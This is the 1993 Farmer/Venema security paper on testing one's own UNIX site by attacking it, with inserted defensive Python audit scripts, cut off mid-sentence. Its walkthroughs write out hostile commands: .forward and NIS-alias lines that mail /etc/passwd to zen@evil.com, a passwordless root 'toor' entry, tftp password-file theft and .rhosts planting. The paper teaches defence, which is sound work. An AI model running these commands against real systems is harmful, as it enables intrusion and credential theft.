Dan Farmer’s Improving the Security of Your Site by Breaking Into It

>From annaliza@netcom.com Ukn Dec 1 23:30:29 1993
From: annaliza@netcom.com (Annaliza T. Orquamada)
Message-Id: <199312020730.XAA16337@mail.netcom.com>
Subject: I posted it…. (fwd)
To: budds@kaiwan.com
Date: Wed, 1 Dec 93 23:30:12 PST

Forwarded message:
>From Dan.Farmer@Corp.Sun.COM Wed Dec 1 20:03:15 1993
Message-Id: <9312020405.AA01850@death.corp.sun.com.corp.sun.com>
To: annaliza@netcom.com
Subject: I posted it….
Date: Wed, 01 Dec 93 20:05:23 -0800
From: Dan <Dan.Farmer@Corp.Sun.COM>

This is absolutely the real thing 🙂

*kiss*

dan

_Improving the Security of Your Site by Breaking Into it_

Dan Farmer              Wietse Venema
Sun Microsystems        Eindhoven University of Technology
zen@sun.com             wietse@wzv.win.tue.nl

Introduction
------------

Every day, all over the world, computer networks and hosts are being
broken into. The level of sophistication of these attacks varies
widely; while it is generally believed that most break-ins succeed due
to weak passwords, there are still a large number of intrusions that use
more advanced techniques to break in. Less is known about the latter
types of break-ins, because by their very nature they are much harder to
detect.

-----

CERT. SRI. The Nic. NCSC. RSA. NASA. MIT. Uunet. Berkeley.
Purdue. Sun. You name it, we’ve seen it broken into. Anything that is
on the Internet (and many that aren’t) seems to be fairly easy game. Are
these targets unusual? What happened?

Fade to…

A young boy, with greasy blonde hair, sitting in a dark room. The room
is illuminated only by the luminescence of the C64’s 40 character
screen. Taking another long drag from his Benson and Hedges cigarette,
the weary system cracker telnets to the next faceless “.mil” site on his
hit list. “guest — guest”, “root — root”, and “system — manager” all
fail. No matter. He has all night… he pencils the host off of his
list, and tiredly types in the next potential victim…

This seems to be the popular image of a system cracker. Young,
inexperienced, and possessing vast quantities of time to waste, to get
into just one more system. However, there is a far more dangerous type
of system cracker out there. One who knows the ins and outs of the
latest security auditing and cracking tools, who can modify them for
specific attacks, and who can write his/her own programs. One who not
only reads about the latest security holes, but also personally
discovers bugs and vulnerabilities. A deadly creature that can both
strike poisonously and hide its tracks without a whisper or hint of a
trail. The uebercracker is here.

-----

Why “uebercracker”? The idea is stolen, obviously, from Nietzsche’s
uebermensch, or, literally translated into English, “over man.”
Nietzsche used the term not to refer to a comic book superman, but
instead a man who had gone beyond the incompetence, pettiness, and
weakness of the everyday man. The uebercracker is therefore the system
cracker who has gone beyond simple cookbook methods of breaking into
systems. An uebercracker is not usually motivated to perform random
acts of violence. Targets are not arbitrary — there is a purpose,
whether it be personal monetary gain, a hit and run raid for
information, or a challenge to strike a major or prestigious site or
net.personality. An uebercracker is hard to detect, harder to stop, and
hardest to keep out of your site for good.

Overview
--------

In this paper we will take an unusual approach to system security.
Instead of merely saying that something is a problem, we will look
through the eyes of a potential intruder, and show _why_ it is one. We
will illustrate that even seemingly harmless network services can become
valuable tools in the search for weak points of a system, even when
these services are operating exactly as they are intended to.

In an effort to shed some light on how more advanced intrusions occur,
this paper outlines various mechanisms that crackers have actually used
to obtain access to systems and, in addition, some techniques we either
suspect intruders of using, or that we have used ourselves in tests or
in friendly/authorized environments.

Our motivation for writing this paper is that system administrators are
often unaware of the dangers presented by anything beyond the most
trivial attacks. While it is widely known that the proper level of
protection depends on what has to be protected, many sites appear to
lack the resources to assess what level of host and network security is
adequate. By showing what intruders can do to gain access to a remote
site, we are trying to help system administrators to make _informed_
decisions on how to secure their site — or not. We will limit the
discussion to techniques that can give a remote intruder access to a
(possibly non-interactive) shell process on a UNIX host. Once this is
achieved, the details of obtaining root privilege are beyond the scope
of this work — we consider them too site-dependent and, in many cases,
too trivial to merit much discussion.

We want to stress that we will not merely run down a list of bugs or
security holes — there will always be new ones for a potential attacker
to exploit. The purpose of this paper is to try to get the reader to
look at her or his system in a new way — one that will hopefully afford
him or her the opportunity to _understand_ how their system can be
compromised, and how.

We would also like to reiterate to the reader that the purpose of this
paper is to show you how to test the security of your own site, not how
to break into other people’s systems. The intrusion techniques we
illustrate here will often leave traces in your system auditing logs —
it might be constructive to examine them after trying some of these
attacks out, to see what a real attack might look like. Certainly other
sites and system administrators will take a very dim view of your
activities if you decide to use their hosts for security testing without
advance authorization; indeed, it is quite possible that legal action
may be pursued against you if they perceive it as an attack.

There are four main parts to the paper. The first part is the
introduction and overview. The second part attempts to give the reader
a feel for what it is like to be an intruder and how to go from knowing
nothing about a system to compromising its security. This section goes
over actual techniques to gain information and entrance and covers basic
strategies such as exploiting trust and abusing improperly configured
basic network services (ftp, mail, tftp, etc.) It also discusses
slightly more advanced topics, such as NIS and NFS, as well as various
common bugs and configuration problems that are somewhat more OS or
system specific. Defensive strategies against each of the various
attacks are also covered here.

The third section deals with trust: how the security of one system
depends on the integrity of other systems. Trust is the most complex
subject in this paper, and for the sake of brevity we will limit the
discussion to clients in disguise.

The fourth section covers the basic steps that a system administrator
may take to protect her or his system. Most of the methods presented
here are merely common sense, but they are often ignored in practice —
one of our goals is to show just how dangerous it can be to ignore basic
security practices.

Case studies, pointers to security-related information, and software are
described in the appendices at the end of the paper.

While exploring the methods and strategies discussed in this paper we
wrote SATAN (Security Analysis Tool for Auditing Networks.) Written in
shell, perl, expect and C, it examines a remote host or set of hosts and
gathers as much information as possible by remotely probing NIS, finger,
NFS, ftp and tftp, rexd, and other services. This information includes
the presence of various network information services as well as
potential security flaws — usually in the form of incorrectly set up or
configured network services, well-known bugs in system or network
utilities, or poor or ignorant policy decisions. It then can either
report on this data or use an expert system to further investigate any
potential security problems. While SATAN doesn’t use all of the methods
that we discuss in the paper, it has succeeded with ominous regularity
in finding serious holes in the security of Internet sites. It will be
posted and made available via anonymous ftp when completed; Appendix A
covers its salient features.

Note that it isn’t possible to cover all possible methods of breaking
into systems in a single paper. Indeed, we won’t cover two of the most
effective methods of breaking into hosts: social engineering and
password cracking. The latter method is so effective, however, that
several of the strategies presented here are geared towards acquiring
password files. In addition, while windowing systems (X, OpenWindows,
etc.) can provide a fertile ground for exploitation, we simply don’t
know many methods that are used to break into remote systems. Many
system crackers use non-bitmapped terminals which can prevent them from
using some of the more interesting methods to exploit windowing systems
effectively (although being able to monitor the victim’s keyboard is
often sufficient to capture passwords). Finally, while worms, viruses,
trojan horses, and other malware are very interesting, they are not
common (on UNIX systems) and probably will use similar techniques to the
ones we describe in this paper as individual parts to their attack
strategy.

Gaining Information
-------------------

Let us assume that you are the head system administrator of Victim
Incorporated’s network of UNIX workstations. In an effort to secure
your machines, you ask a friendly system administrator from a nearby
site (evil.com) to give you an account on one of her machines so that
you can look at your own system’s security from the outside.

What should you do? First, try to gather information about your
(target) host. There is a wealth of network services to look at:
finger, showmount, and rpcinfo are good starting points. But don’t stop
there — you should also utilize DNS, whois, sendmail (smtp), ftp, uucp,
and as many other services as you can find. There are so many methods
and techniques that space precludes us from showing all of them, but we
will try to show a cross-section of the most common and/or dangerous
strategies that we have seen or have thought of. Ideally, you would
gather such information about all hosts on the subnet or area of attack
— information is power — but for now we’ll examine only our intended
target.

To start out, you look at what the ubiquitous finger command shows you
(assume it is 6pm, Nov 6, 1993):

victim % finger @victim.com
[victim.com]
Login  Name       TTY  Idle  When       Where
zen    Dr. Fubar  co   1d    Wed 08:00  death.com

Good! A single idle user — it is likely that no one will notice if you
actually manage to break in.

Now you try more tactics. As every finger devotee knows, fingering “@”,
“0”, and “”, as well as common names, such as root, bin, ftp, system,
guest, demo, manager, etc., can reveal interesting information. What
that information is depends on the version of finger that your target is
running, but the most notable are account names, along with their home
directories and the host that they last logged in from.

To add to this information, you can use rusers (in particular with the
-l flag) to get useful information on logged-in users.

Trying these commands on victim.com reveals the following information,
presented in a compressed tabular form to save space:

Login   Home-dir     Shell      Last login, from where
-----   --------     -----      ----------------------
root    /            /bin/sh    Fri Nov 5 07:42 on ttyp1 from big.victim.com
bin     /bin                    Never logged in
nobody  /                       Tue Jun 15 08:57 on ttyp2 from server.victim.co
daemon  /                       Tue Mar 23 12:14 on ttyp0 from big.victim.com
sync    /            /bin/sync  Tue Mar 23 12:14 on ttyp0 from big.victim.com
zen     /home/zen    /bin/bash  On since Wed Nov 6 on ttyp3 from death.com
sam     /home/sam    /bin/csh   Wed Nov 5 05:33 on ttyp3 from evil.com
guest   /export/foo  /bin/sh    Never logged in
ftp     /home/ftp               Never logged in

Both our experiments with SATAN and watching system crackers at work
have proved to us that finger is one of the most dangerous services,
because it is so useful for investigating a potential target. However,
much of this information is useful only when used in conjunction with
other data.

For instance, running showmount on your target reveals:

evil % showmount -e victim.com
export list for victim.com:
/export                            (everyone)
/var                               (everyone)
/usr                               easy
/export/exec/kvm/sun4c.sunos.4.1.3 easy
/export/root/easy                  easy
/export/swap/easy                  easy

Note that /export/foo is exported to the world; also note that this is
user guest’s home directory. Time for your first break-in! In this
case, you’ll mount the home directory of user “guest.” Since you don’t
have a corresponding account on the local machine and since root cannot
modify files on an NFS mounted filesystem, you create a “guest” account
in your local password file. As user guest you can put an .rhosts entry
in the remote guest home directory, which will allow you to login to the
target machine without having to supply a password.

evil # mount victim.com:/export/foo /foo
evil # cd /foo
evil # ls -lag
total 3
1 drwxr-xr-x 11 root  daemon  512 Jun 19 09:47 .
1 drwxr-xr-x  7 root  wheel   512 Jul 19  1991 ..
1 drwx--x--x  9 10001 daemon 1024 Aug  3 15:49 guest
evil # echo guest:x:10001:1:temporary breakin account:/: >> /etc/passwd
evil # ls -lag
total 3
1 drwxr-xr-x 11 root  daemon  512 Jun 19 09:47 .
1 drwxr-xr-x  7 root  wheel   512 Jul 19  1991 ..
1 drwx--x--x  9 guest daemon 1024 Aug  3 15:49 guest
evil # su guest
evil % echo victim.com >> guest/.rhosts
evil % rlogin victim.com
Welcome to victim.com!
victim %

If, instead of home directories, victim.com were exporting filesystems
with user commands (say, /usr or /usr/local/bin), you could replace a
command with a trojan horse that executes any command of your choice.
The next user to execute that command would execute your program.

We suggest that filesystems be exported:

o Read/write only to specific, trusted clients.
o Read-only, where possible (data or programs can often be
exported in this manner.)
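
The cross-check that the walk-through above does by hand (export list against home directories) can be run against your own site. This is an added example, not code from the paper or from SATAN; the function names are hypothetical and both samples are constructed from the listings shown above.

```python
"""Cross-check NFS exports against account home directories.
Added example; not code from the paper or from SATAN."""
import posixpath

# Constructed sample: `showmount -e` output in the format shown above.
SHOWMOUNT = """\
export list for victim.com:
/export                            (everyone)
/var                               (everyone)
/usr                               easy
/export/exec/kvm/sun4c.sunos.4.1.3 easy
/export/root/easy                  easy
/export/swap/easy                  easy
"""

# Constructed sample: passwd-format lines (login:pw:uid:gid:gecos:home:shell).
PASSWD = """\
root:*:0:1:Operator:/:/bin/sh
zen:*:1001:10:Dr. Fubar:/home/zen:/bin/bash
guest:*:10001:1:Guest:/export/foo:/bin/sh
ftp:*:101:1:Anonymous FTP:/home/ftp:
"""

WORLD = "*"  # internal marker for "any client may mount this"


def parse_showmount(text):
    """Return {exported_path: [clients]}; '(everyone)' becomes [WORLD]."""
    exports = {}
    for line in text.splitlines():
        fields = line.split(None, 1)
        if not fields or not fields[0].startswith("/"):
            continue  # header or blank line
        clients = fields[1].strip() if len(fields) > 1 else ""
        if clients in ("(everyone)", "*"):
            exports[fields[0]] = [WORLD]
        else:
            exports[fields[0]] = clients.replace(",", " ").split()
    return exports


def is_under(path, root):
    """True if path is root or lies beneath it.

    Compares whole path components, so '/exportfoo' is not under '/export'.
    """
    path, root = posixpath.normpath(path), posixpath.normpath(root)
    return root == "/" or path == root or path.startswith(root + "/")


def exposed_homes(showmount_text, passwd_text):
    """Return (login, home, export) for each home under a world export."""
    exports = parse_showmount(showmount_text)
    world = [path for path, clients in exports.items() if WORLD in clients]
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:
            continue  # not a passwd entry
        login, home = fields[0], fields[5]
        covering = [export for export in world if is_under(home, export)]
        if covering:
            # Report the deepest export point that contains the home.
            findings.append((login, home, max(covering, key=len)))
    return findings


if __name__ == "__main__":
    for login, home, export in exposed_homes(SHOWMOUNT, PASSWD):
        print("%s: home %s is reachable through world export %s"
              % (login, home, export))
```

The comparison works on path names only, so a home directory that sits on a separately mounted filesystem below the export point is still reported and needs a manual look.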

If the target has a “+” wildcard in its /etc/hosts.equiv (the default in
various vendors’ machines) or has the netgroups bug (CERT advisory
91:12), any non-root user with a login name in the target’s password
file can rlogin to the target without a password. And since the user
“bin” often owns key files and directories, your next attack is to try
to log in to the target host and modify the password file to let you
have root access:

evil % whoami
bin
evil % rsh victim.com csh -i
Warning: no access to tty; thus no job control in this shell...
victim % ls -ldg /etc
drwxr-sr-x 8 bin staff 2048 Jul 24 18:02 /etc
victim % cd /etc
victim % mv passwd pw.old
victim % (echo toor::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
victim % ^D
evil % rlogin victim.com -l toor
Welcome to victim.com!
victim #

A few notes about the method used above; “rsh victim.com csh -i” is used
to initially get onto the system because it doesn’t leave any traces in
the wtmp or utmp system auditing files, making the rsh invisible for
finger and who. The remote shell isn’t attached to a pseudo-terminal,
however, so that screen-oriented programs such as pagers and editors
will fail — but it is very handy for brief exploration.

The COPS security auditing tool (see appendix D) will report key files
or directories that are writable to accounts other than the
superuser. If you run SunOS 4.x you can apply patch 100103 to fix most
file permission problems. On many systems, rsh probes as shown above,
even when successful, would remain completely unnoticed; the tcp wrapper
(appendix D), which logs incoming connections, can help to expose such
activities.
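
A check for the "+" wildcard discussed above, written as an added example (it is not COPS code and not from the paper). The function name and the sample file are constructed for illustration, and treating lines that start with "#" as comments is an assumption that does not hold for every rlogin implementation.

```python
"""Audit hosts.equiv / .rhosts content for wildcard trust.
Added example; not COPS code."""

# Constructed sample hosts.equiv.
HOSTS_EQUIV = """\
# trusted clients
big.victim.com
server.victim.com zen
+@admins
-untrusted.victim.com
+
"""


def audit_trust_file(text, is_hosts_equiv=True):
    """Return (line_number, severity, message) for risky entries.

    Entry syntax is "host [user]". A leading '-' denies, '+' alone is a
    wildcard, and '+@name' refers to a netgroup. Set is_hosts_equiv to
    False when checking a user's .rhosts file.
    """
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):   # assumption: '#' is a comment
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None

        if host == "+":
            findings.append((lineno, "HIGH",
                             "'+' trusts every host on the network"))
        elif host.startswith("+@"):
            findings.append((lineno, "REVIEW",
                             "netgroup '%s' is trusted; check its members "
                             "and CERT advisory 91:12" % host[2:]))
        if host.startswith("-"):
            continue  # a deny entry grants nothing

        if user == "+":
            findings.append((lineno, "HIGH",
                             "'+' in the user field trusts every remote user"))
        elif user and not user.startswith("-") and is_hosts_equiv:
            # In hosts.equiv a user field widens trust instead of narrowing it.
            findings.append((lineno, "HIGH",
                             "remote user '%s' may log in as any local "
                             "non-root user" % user))
    return findings


if __name__ == "__main__":
    for lineno, severity, message in audit_trust_file(HOSTS_EQUIV):
        print("/etc/hosts.equiv:%d: %s: %s" % (lineno, severity, message))
```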

----

What now? Have you uncovered all the holes on your target system? Not
by a long shot. Going back to the finger results on your target, you
notice that it has an “ftp” account, which usually means that anonymous
ftp is enabled. Anonymous ftp can be an easy way to get access, as it
is often misconfigured. For example, the target may have a complete
copy of the /etc/passwd file in the anonymous ftp ~ftp/etc directory
instead of a stripped down version. In this example, though, you see
that the latter doesn’t seem to be true (how can you tell without
actually examining the file?) However, the home directory of ftp on
victim.com is writable. This allows you to remotely execute a command
— in this case, mailing the password file back to yourself — by the
simple method of creating a .forward file that executes a command when
mail is sent to the ftp account. This is the same mechanism of piping
mail to a program that the “vacation” program uses to automatically
reply to mail messages.

evil % cat forward_sucker_file
"|/bin/mail zen@evil.com < /etc/passwd"

evil % ftp victim.com
Connected to victim.com
220 victim FTP server ready.
Name (victim.com:zen): ftp
331 Guest login ok, send ident as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> ls -lga
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 bytes).
total 5
drwxr-xr-x 4 101 1 512 Jun 20 1991 .
drwxr-xr-x 4 101 1 512 Jun 20 1991 ..
drwxr-xr-x 2 0 1 512 Jun 20 1991 bin
drwxr-xr-x 2 0 1 512 Jun 20 1991 etc
drwxr-xr-x 3 101 1 512 Aug 22 1991 pub
226 ASCII Transfer complete.
242 bytes received in 0.066 seconds (3.6 Kbytes/s)
ftp> put forward_sucker_file .forward
43 bytes sent in 0.0015 seconds (28 Kbytes/s)
ftp> quit
evil % echo test | mail ftp@victim.com

Now you simply wait for the password file to be sent back to you.

The security auditing tool COPS will check your anonymous ftp setup; see
the man page for ftpd, the documentation/code for COPS, or CERT advisory
93:10 for information on how to set up anonymous ftp correctly.
Vulnerabilities in ftp are often a matter of incorrect ownership or
permissions of key files or directories. At the very least, make sure
that ~ftp and all “system” directories and files below ~ftp are owned by
root and are not writable by any user.
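
The ownership and permission rule above, plus the two problems from the walk-through (a writable ~ftp holding a .forward, and an unstripped etc/passwd), as a tree audit. This is an added example, not COPS code; the list of "system" directories, the function names and the scratch tree are assumptions made for illustration.

```python
"""Report anything under an anonymous-ftp home that breaks the ownership
and permission rules given above. Added example; not COPS code."""
import os
import stat
import tempfile

SYSTEM_DIRS = ("bin", "etc")        # assumed "system" directories below ~ftp
DANGEROUS_NAMES = (".forward", ".rhosts")
NO_HASH = ("", "*", "x")            # password fields that carry no hash


def check_entry(path, rel, trusted_uid, findings):
    """Append findings for one file or directory (symlinks not followed)."""
    st = os.lstat(path)
    if st.st_uid != trusted_uid:
        findings.append((rel, "owned by uid %d, expected %d"
                         % (st.st_uid, trusted_uid)))
    writable = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
    if writable and not stat.S_ISLNK(st.st_mode):
        findings.append((rel, "group/world writable (mode %o)"
                         % stat.S_IMODE(st.st_mode)))


def audit_ftp_passwd(path, rel="etc/passwd"):
    """Flag entries in ~ftp/etc/passwd that still carry a password hash."""
    findings = []
    if os.path.isfile(path):
        with open(path) as handle:
            for line in handle:
                fields = line.rstrip("\n").split(":")
                if len(fields) >= 2 and fields[1] not in NO_HASH:
                    findings.append((rel, "entry '%s' carries a password hash"
                                     % fields[0]))
    return findings


def audit_ftp_tree(ftp_home, trusted_uid=0):
    """Return sorted (relative_path, problem) tuples for an ftp home.

    trusted_uid is root (0) as the paper recommends; it is a parameter so
    the check can be tried on a scratch tree by an unprivileged user.
    """
    findings = []
    check_entry(ftp_home, ".", trusted_uid, findings)
    for name in DANGEROUS_NAMES:
        if os.path.lexists(os.path.join(ftp_home, name)):
            findings.append((name, "must not exist in the ftp home"))
    for sysdir in SYSTEM_DIRS:
        top = os.path.join(ftp_home, sysdir)
        if not os.path.isdir(top):
            continue
        for dirpath, _dirnames, filenames in os.walk(top):
            entries = [dirpath] + [os.path.join(dirpath, f) for f in filenames]
            for entry in entries:
                check_entry(entry, os.path.relpath(entry, ftp_home),
                            trusted_uid, findings)
    findings.extend(audit_ftp_passwd(os.path.join(ftp_home, "etc", "passwd")))
    return sorted(findings)


def build_demo_tree():
    """Constructed scratch tree: a writable ~ftp that holds a .forward and
    an unstripped etc/passwd (the hash below is a made-up string)."""
    home = tempfile.mkdtemp(prefix="ftp-demo-")
    for sub in ("bin", "etc", "pub"):
        os.mkdir(os.path.join(home, sub))
        os.chmod(os.path.join(home, sub), 0o755)
    passwd = os.path.join(home, "etc", "passwd")
    with open(passwd, "w") as handle:
        handle.write("ftp:*:101:1::/home/ftp:\n"
                     "zen:ab0123456789X:1001:10::/home/zen:/bin/sh\n")
    os.chmod(passwd, 0o644)
    open(os.path.join(home, ".forward"), "w").close()
    os.chmod(home, 0o777)
    return home


if __name__ == "__main__":
    demo = build_demo_tree()
    # The scratch tree belongs to the current user, so trust that uid here.
    for rel, problem in audit_ftp_tree(demo, trusted_uid=os.getuid()):
        print("%s: %s" % (rel, problem))
```

On a real server, call `audit_ftp_tree` on the ftp account's home directory with the default `trusted_uid=0`.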

While looking at ftp, you can check for an older bug that was once
widely exploited:

% ftp -n
ftp> open victim.com
Connected to victim.com
220 victim.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password.
ftp> quote cwd ~root
530 Please login with USER and PASS.
ftp> quote pass ftp
230 Guest login ok, access restrictions apply.
ftp> ls -al / (or whatever)

If this works, you now are logged in as root, and able to modify the
password file, or whatever you desire. If your system exhibits this
bug, you should definitely get an update to your ftpd daemon, either
from your vendor or (via anon ftp) from ftp.uu.net.

The wuarchive ftpd, a popular replacement ftp daemon put out by the
Washington University in Saint Louis, had almost the same problem. If
your wuarchive ftpd pre-dates April 8, 1993, you should replace it by a
more recent version.

Finally, there is a program vaguely similar to ftp — tftp, or the
trivial file transfer program. This daemon doesn’t require any password
for authentication; if a host provides tftp without restricting the
access (usually via some secure flag set in the inetd.conf file), an
attacker can read and write files anywhere on the system. In the
example, you get the remote password file and place it in your local
/tmp directory:

evil % tftp
tftp> connect victim.com
tftp> get /etc/passwd /tmp/passwd.victim
tftp> quit

For security’s sake, tftp should not be run; if tftp is necessary, use
the secure option/flag to restrict access to a directory that has no
valuable information, or run it under the control of a chroot wrapper
program.

----

If none of the previous methods have worked, it is time to go on to more
drastic measures. You have a friend in rpcinfo, another very handy
program, sometimes even more useful than finger. Many hosts run RPC
services that can be exploited; rpcinfo can talk to the portmapper and
show you the way. It can tell you if the host is running NIS, if it is
a NIS server or slave, if a diskless workstation is around, if it is
running NFS, any of the info services (rusersd, rstatd, etc.), or any
other unusual programs (auditing or security related). For instance,
going back to our sample target:

evil % rpcinfo -p victim.com    [output trimmed for brevity’s sake]
program  vers  proto  port
100004   2     tcp    673   ypserv
100005   1     udp    721   mountd
100003   2     udp    2049  nfs
100026   1     udp    733   bootparam
100017   1     tcp    1274  rexd

In this case, you can see several significant facts about our target;
first of which is that it is an NIS server. It is perhaps not widely
known, but once you know the NIS domainname of a server, you can get any
of its NIS maps by a simple rpc query, even when you are outside the
subnet served by the NIS server (for example, using the YPX program that
can be found in the comp.sources.misc archives on ftp.uu.net). In
addition, very much like easily guessed passwords, many systems use
easily guessed NIS domainnames. Trying to guess the NIS domainname is
often very fruitful. Good candidates are the fully and partially
qualified hostname (e.g. “victim” and “victim.com”), the organization
name, netgroup names in “showmount” output, and so on. If you wanted to
guess that the domainname was “victim”, you could type:

evil % ypwhich -d victim victim.com
Domain victim not bound.

This was an unsuccessful attempt; if you had guessed correctly it would
have returned with the host name of victim.com’s NIS server. However,
note from the NFS section that victim.com is exporting the “/var”
directory to the world. All that is needed is to mount this directory
and look in the “yp” subdirectory — among other things you will see
another subdirectory that contains the domainname of the target.

evil # mount victim.com:/var /foo
evil # cd /foo
evil # /bin/ls -alg /foo/yp
total 17
1 drwxr-sr-x 4 root staff 512 Jul 12 14:22 .
1 drwxr-sr-x 11 root staff 512 Jun 29 10:54 ..
11 -rwxr-xr-x 1 root staff 10993 Apr 22 11:56 Makefile
1 drwxr-sr-x 2 root staff 512 Apr 22 11:20 binding
2 drwxr-sr-x 2 root staff 1536 Jul 12 14:22 foo_bar
[…]

In this case, “foo_bar” is the NIS domain name.

In addition, the NIS maps often contain a good list of user/employee
names as well as internal host lists, not to mention passwords for
cracking.

Appendix C details the results of a case study on NIS password files.

----

You note that the rpcinfo output also showed that victim.com runs rexd.
Like the rsh daemon, rexd processes requests of the form “please execute
this command as that user”. Unlike rshd, however, rexd does not care if
the client host is in the hosts.equiv or .rhosts files. Normally the rexd
client program is the “on” command, but it only takes a short C program
to send arbitrary client host and userid information to the rexd server;
rexd will happily execute the command. For these reasons, running rexd
is similar to having no passwords at all: all security is in the client,
not in the server where it should be. Rexd security can be improved
somewhat by using secure RPC.
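
The tftp advice and the rexd warning above both come down to lines in inetd.conf, as does the earlier point that the tcp wrapper makes rsh probes visible. The following audit is an added example, not code from the paper or its tools; the sample file is constructed, and "-s" is assumed to be the secure flag as on SunOS-style in.tftpd.

```python
"""Audit inetd.conf for the services singled out above.
Added example; not code from the paper."""

# Constructed sample in the usual inetd.conf layout:
# service  socket  proto  wait  user  server-path  argv...
INETD_CONF = """\
ftp     stream  tcp      nowait  root  /usr/etc/in.ftpd   in.ftpd
login   stream  tcp      nowait  root  /usr/etc/tcpd      in.rlogind
shell   stream  tcp      nowait  root  /usr/etc/in.rshd   in.rshd
tftp    dgram   udp      wait    root  /usr/etc/in.tftpd  in.tftpd
#tftp   dgram   udp      wait    root  /usr/etc/in.tftpd  in.tftpd -s /tftpboot
rexd/1  stream  rpc/tcp  wait    root  /usr/etc/rpc.rexd  rpc.rexd
"""

R_SERVICES = ("shell", "login", "exec")  # services that rely on host trust


def parse_inetd(text):
    """Yield (service, user, server_path, argv) for each active entry."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments
        fields = line.split()
        if len(fields) < 6:
            continue  # blank, commented out, or malformed
        service = fields[0].split("/", 1)[0]  # 'rexd/1' -> 'rexd'
        yield service, fields[4], fields[5], fields[6:]


def audit_inetd(text):
    """Return (service, severity, message) findings in file order."""
    findings = []
    for service, user, server, argv in parse_inetd(text):
        wrapped = server.endswith("/tcpd")    # started through the tcp wrapper
        if service == "tftp":
            if "-s" not in argv:
                findings.append((service, "HIGH",
                                 "tftp runs as %s without the secure flag; "
                                 "disable it or restrict it to one directory"
                                 % user))
            else:
                directory = argv[argv.index("-s") + 1:][:1] or ["(default)"]
                findings.append((service, "REVIEW",
                                 "tftp is restricted to %s; keep nothing "
                                 "valuable there" % directory[0]))
        elif service == "rexd":
            findings.append((service, "HIGH",
                             "rexd trusts the client's claimed user id; "
                             "disable it or require secure RPC"))
        elif service in R_SERVICES and not wrapped:
            findings.append((service, "REVIEW",
                             "not started through the tcp wrapper, so "
                             "incoming connections are not logged"))
    return findings


if __name__ == "__main__":
    for service, severity, message in audit_inetd(INETD_CONF):
        print("%-6s %-6s %s" % (service, severity, message))
```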

----

While looking at the output from rpcinfo, you observe that victim.com
also seems to be a server for diskless workstations. This is evidenced
by the presence of the bootparam service, which provides information to
the diskless clients for booting. If you ask nicely, using
BOOTPARAMPROC_WHOAMI and provide the address of a client, you can get
its NIS domainname. This can be very useful when combined with the fact
that you can get arbitrary NIS maps (such as the password file) when you
know the NIS domainname. Here is a sample code snippet to do just that
(bootparam is part of SATAN.)

char *server;
struct bp_whoami_arg arg; /* query */
struct bp_whoami_res res; /* reply */

/* initializations omitted… */

callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS, BOOTPARAMPROC_WHOAMI,
        xdr_bp_whoami_arg, &arg, xdr_bp_whoami_res, &res);

printf("%s has nisdomain %s\n", server, res.domain_name);

The showmount output indicated that “easy” is a diskless client of
victim.com, so we use its client address in the BOOTPARAMPROC_WHOAMI
query:

evil % bootparam victim.com easy.victim.com
victim.com has nisdomain foo_bar

----

NIS masters control the mail aliases for the NIS domain in question.
Just like local mail alias files, you can create a mail alias that will
execute commands when mail is sent to it (a once popular example of this
is the “decode” alias which uudecodes mail files sent to it.) For
instance, here you create an alias “foo”, which mails the password file
back to evil.com by simply mailing any message to it:

nis-master # echo 'foo: "| mail zen@evil.com < /etc/passwd "' >> /etc/aliases
nis-master # cd /var/yp
nis-master # make aliases
nis-master # echo test | mail -v foo@victim.com

Hopefully attackers won’t have control of your NIS master host, but even
more hopefully the lesson is clear — NIS is normally insecure, but if
an attacker has control of your NIS master, then s/he effectively has
control of the client hosts (e.g. can execute arbitrary commands).

There aren’t many effective defenses against NIS attacks; it is an
insecure service that has almost no authentication between clients and
servers. To make things worse, it seems fairly clear that arbitrary
maps can be forced onto even master servers (e.g., it is possible to
treat an NIS server as a client). This, obviously, would subvert the
entire schema. If it is absolutely necessary to use NIS, choosing a
hard to guess domainname can help slightly, but if you run diskless
clients that are exposed to potential attackers then it is trivial for
an attacker to defeat this simple step by using the bootparam trick to
get the domainname. If NIS is used to propagate the password maps, then
shadow passwords do not give additional protection because the shadow
map is still accessible to any attacker that has root on an attacking
host. Better is to use NIS as little as possible, or to at least
realize that the maps can be subject to perusal by potentially hostile
forces.

Secure RPC goes a long way to diminish the threat, but it has its own
problems, primarily in that it is difficult to administer, but also in
that the cryptographic methods used within are not very strong. It has
been rumored that NIS+, Sun’s new network information service, fixes
some of these problems, but until now it has been limited to running on
Suns, and thus far has not lived up to the promise of the design.
Finally, using packet filtering (at the very least port 111) or
securelib (see appendix D), or, for Suns, applying Sun patch 100482-02
all can help.

----

The portmapper only knows about RPC services. Other network services
can be located with a brute-force method that connects to all network
ports. Many network utilities and windowing systems listen to specific
ports (e.g. sendmail is on port 25, telnet is on port 23, X windows is
usually on port 6000, etc.) SATAN includes a program that scans the
ports of a remote host and reports on its findings; if you run it
against our target, you see:

evil % tcpmap victim.com
Mapping 128.128.128.1
port 21: ftp
port 23: telnet
port 25: smtp
port 37: time
port 79: finger
port 512: exec
port 513: login
port 514: shell
port 515: printer
port 6000: (X)

This suggests that victim.com is running X windows. If not protected
properly (via the magic cookie or xhost mechanisms), window displays can
be captured or watched, user keystrokes may be stolen, programs executed
remotely, etc. Also, if the target is running X and accepts a telnet to
port 6000, that can be used for a denial of service attack, as the
target’s windowing system will often “freeze up” for a short period of
time. One method to determine the vulnerability of an X server is to
connect to it via the XOpenDisplay() function; if the function returns
NULL then you cannot access the victim’s display (opendisplay is part of
SATAN):

char *hostname;

if (XOpenDisplay(hostname) == NULL) {
    printf("Cannot open display: %s\n", hostname);
} else {
    printf("Can open display: %s\n", hostname);
}

evil % opendisplay victim.com:0
Cannot open display: victim.com:0

X terminals, though much less powerful than a complete UNIX system, can
have their own security problems. Many X terminals permit unrestricted
rsh access, allowing you to start X client programs in the victim’s
terminal with the output appearing on your own screen:

evil % xhost +xvictim.victim.com
evil % rsh xvictim.victim.com telnet victim.com -display evil.com

In any case, give as much thought to your window security as your
